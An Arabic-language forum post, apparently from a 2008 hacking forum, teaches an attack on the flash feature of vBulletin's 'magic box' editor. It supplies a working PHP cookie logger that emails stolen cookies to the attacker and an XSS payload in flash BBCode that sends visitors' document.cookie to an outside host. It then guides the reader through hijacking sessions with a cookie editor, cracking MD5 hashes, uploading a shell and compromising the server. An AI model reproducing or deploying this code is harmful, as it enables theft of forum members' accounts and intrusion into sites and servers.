ثغره الصندوق السحري والماسي (الفلاش) بالصور

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

ثغره الصندوق السحري والماسي (الفلاش) بالصور

مُساهمة من طرف الزعيم في الأحد مارس 16, 2008 4:22 am

السلام عليكم

اليوم بشرح ثغره الصندوق السحري والماسي (الفلاش) اللي اكتشفها اخونا العندليب نظرًا لطلب شرحها

الثغره سهله ومو محتاجه شرح

بسم الله نبدأ

المتطلبات :

1- لوج >>انصح بلوج اخوي ديفلل<< وهو شغال وانا ماجربت غيره واخترقت المنتديات فيه
2- مساحه تسمح بملفات php واللايكوس ينفع وانا شغال على اللايكوس والتبليغ يوصل بثانيه
3- ايميل بمساحه كبيره لانه لو حطيت الفلاش بموضوع ومروا عليه اعضاء اذكياء واركز على اذكياء لانهم يمرون على الفلاش
1000 مره ولو خمس اعضاء يمرون 1000 مره اعتقد ايميلك بينفجر لانه راح توصلك 5000 رساله خخخخخخخخ

الشروط لنجاح الثغره :

1- صندوق سحري او ماسي وتكون خاصيه الفلاش موجوده بس... وللعلم اليوم جربت الثغره على vb3.0.7 واشتغلت

الحين اذا كل هذا توفر ما عليك الا تحط هالاكسبلويت بالرد او بموضوع او بالتوقيع انت وذكائك

وهذا اللوج


اقتباس:

$YourMail = "znj@hotmail.com"; // Your E-mail

$Ip = $REMOTE_ADDR;
$Cooki_e = $_GET['id'];
$NameOfAttack = $_GET['nm'];
$Refresh = $_GET['re'];

$ReplaceCookie1 = array("=",";");
$ReplaceCookie2 = array("[ "," ] ");
$Cooki_e = str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki _e); // Replace

//
$Hdr = "From: S4aLog $Msg =
"
Mr Attacker Wink ,,, S4aLog v1 Beta <<
[ ".$NameOfAttack." ] ,, Name Of Attack
[ ".$Refresh." ] ,, Refresh Page
[ ".$Ip." ] ,, Ip
[ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ]
[
devil-00@hotmail.co.uk - devil.00@gmail.com ]
-----------------------------------------------
Cookie ::
".$Cooki_e."
";

$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);

if($Send){
if($Refresh <> ""){header("location:".$Refresh);}
}
?>






وكل اللي عليك تغيره باللوج كله هو الايميل في هالسطر حط ايميلك وبعدها ارفع اللوج



اقتباس:
$YourMail = "znj@hotmail.com"; // Your E-mail




بعد ما نرفع اللوج نروح للمنتدى ونحط هالاكسبلويت برد ولا بموضوع ولا بتوقيع مثل ما ذكرنا
وحسب ماتحب

الاكسبلويت :


اقتباس:
[flash=http://www.xxx.com/hitler.swf]onmouseover='location.href="http: http://www.xxx.com/log.php?nm=al-battar.net&re=http://www.xxx.com/vb&id="+ document·cookie'[/flash]




المتغيرات :
1-
http://www.xxx.com/hitler.swf << حط رابط الفلاش مالك
2-
http://www.xxx.com/log.php << حط رابط اللوج
3-
http://www.xxx.com/vb << حط رابط الصفحه اللي تبي الضحيه يروح لها بعد مرور الماوس على الفلاش

وياليت تنتبه وانت تغير المتغيرات بالكود اي غلط بالكود ماراح تشتغل وياك
الحين اقعد بايميلك وانطر الكوكيز يوصلك

وهذي صوره للايميل اللي راح يوصلك وللعلم كل منتدى عن منتدى يفرق الكوكيز
في منتديات مايوصلك وياها frlastactivity وبجذي لما نعدل الكوكيز نحطه نفس frlastvisit
وفي منتديات يوصلونك اثنينهم ولكن نفس الشي حطهم نفس الشي مافي مشاكل وراح تدخل بالعضويه








بعد ما توصلنا معلومات الكوكيز نروح ونخدع الكوكيز
لخداع الكوكيز نحتاج هالبرنامج وهو برنامج cookie editor
وهذي وصله لتحميله
كلك يمين وحفظ باسم

الحين لنفرض وصلتنا معلومات الكوكيز واحنا مسجلين بالمنتدى شي اكيد
ونفرض هذي هي المعلومات اللي وصلتنا



كل اللي علينا نفتح كوكيز ايدتور


1- اضغط

2- اكتب اسم الموقع
3- اضغط هنيه بعد ما تكتب الموقع
الحين اللي بالمربع الاحمر هم اسامي المعلومات واللي بالازرق هم المعلومات نفسهم كل اللي عليك
تروح للإيميل وتاخذ المعلومه وتبدلها من البرنامج شلون؟؟
اضغط مرتين على المعلومه بالبرنامج يطلع لك مربع في خانتين الخانه الاولى اسم المعلومه
والثانيه المعلومه نفسها وهي اللي لازم نغيرها بالمعلومه اللي في الايميل

بعدها افتح المنتدى وراح تلقا نفسك بالعضوية صاحبه معلومات الكوكيز اللي بدلناها بمعلوماتنا

والباقي عليك سواء بتخترق المنتدى او غيره والكل عنده طرقه والافضل تحاول تفك تشفير md5
وتدخل لوحه التحكم وترفع شل وتخترق المنتدى فالموقع فالسيرفر

وبالنسبه لطريقه الترقيع هي جعل كلمه cookie من الكلمات المحظورة والممنوعه في المنتدى



اسف لعدم وجود صور للشرح
avatar
الزعيم
مدير
مدير

عدد الرسائل : 624
العمر : 21
تبادل اعلاني :
تاريخ التسجيل : 09/02/2008

بطاقة الشخصية
ننننم:

الرجوع الى أعلى الصفحة اذهب الى الأسفل

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى